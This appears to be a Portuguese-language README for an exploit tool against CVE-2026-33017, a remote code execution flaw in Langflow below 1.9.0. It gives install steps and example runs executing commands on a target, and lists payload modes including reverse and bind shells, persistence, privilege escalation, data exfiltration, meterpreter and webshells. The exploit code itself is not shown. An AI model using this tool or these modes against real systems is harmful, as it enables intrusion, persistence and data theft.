
Ferramenta de exploração da CVE-2026-33017 para Langflow <1.9.0. Recursos: reverse shells, execução de comandos, operações de arquivos, persistência e testes automatizados. Valida o impacto da vulnerabilidade crítica de RCE. Apenas para avaliações de segurança autorizadas.
CVE-2026-33017 · Testes de segurança autorizados para execução remota de código no Langflow
Ferramentas de pesquisa e red team para validar o CVE-2026-33017 em instâncias Langflow que você tenha autorização explícita de avaliar. Não é para uso não autorizado.
Este projeto destina-se somente a:
O acesso não autorizado a sistemas de computador é ilegal. Você é o único responsável por cumprir as leis aplicáveis e obter permissão por escrito antes de testar qualquer alvo. Os autores não aceitam nenhuma responsabilidade por uso indevido.
Framework Python assíncrono para avaliar implantações Langflow potencialmente afetadas pelo CVE-2026-33017. Ele suporta verificação de vulnerabilidades, seleção de modos de payload, execução automatizada de avaliações e relatórios estruturados para documentação de engajamento.
--check-only não destrutivo--auto / orientadas a lotehttpx com registro configurávelflow-id e client-id válidos do Langflow para o ambiente de testegit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
.
├── exploit.py # Mecanismo principal de CLI e avaliação
├── requirements.txt # Dependências Python
├── README.md # Este arquivo
└── venv/ # Virtualenv local (não para controle de versão)
Se um alvo for vulnerável ao CVE-2026-33017:
--check-only para verificar o patch--check-only antes de usar qualquer modo de payloadContribuições que melhorem a confiabilidade, os relatórios, a precisão da detecção ou a documentação defensiva são bem-vindas. Abra uma issue ou pull request com uma descrição clara da alteração e de como ela foi validada em um ambiente de laboratório.
Fornecido somente para testes de segurança autorizados e pesquisa educacional.
Nenhuma garantia é fornecida. Use por sua conta e risco e em conformidade com a lei.
Sudeepa Wanigarathna
Para pesquisa de segurança autorizada · CVE-2026-33017
| Item | Detalhe |
|---|
| CVE | CVE-2026-33017 |
| Alvo | Langflow |
| Mitigação sugerida | Atualize para Langflow ≥ 1.9.0 |
| Linguagem | Python 3.10+ |
| Versão | 1.0.0 |
| Autor | Sudeepa Wanigarathna |
| Flag |
|---|
| Descrição |
|---|
-u, --url | URL base do alvo (ex.: http://127.0.0.1:7860) |
-f, --flow-id | ID do fluxo Langflow |
-c, --client-id | Valor do cookie Client ID |
| Flag | Descrição |
|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all (padrão: reverse_shell) |
-l, --lhost | Host do ouvinte (auto-detectado quando omitido, quando aplicável) |
-p, --lport | Porta do ouvinte (obrigatória para modos de shell / meterpreter) |
--cmd | String de comando (command_exec) |
--file-path | Caminho para modos de leitura/envio de arquivo |
--file-data | Conteúdo de upload (file_upload) |
| Flag | Descrição |
|---|
--auto | Fluxo de exploração automatizado |
--check-only | Somente verificação de vulnerabilidade |
--batch | Modo lote |
--report | text | json | html | markdown |
--output-file | Grava relatório/saída em um arquivo |
-v, --verbose | Registro detalhado |
-q, --quiet | Apenas erros |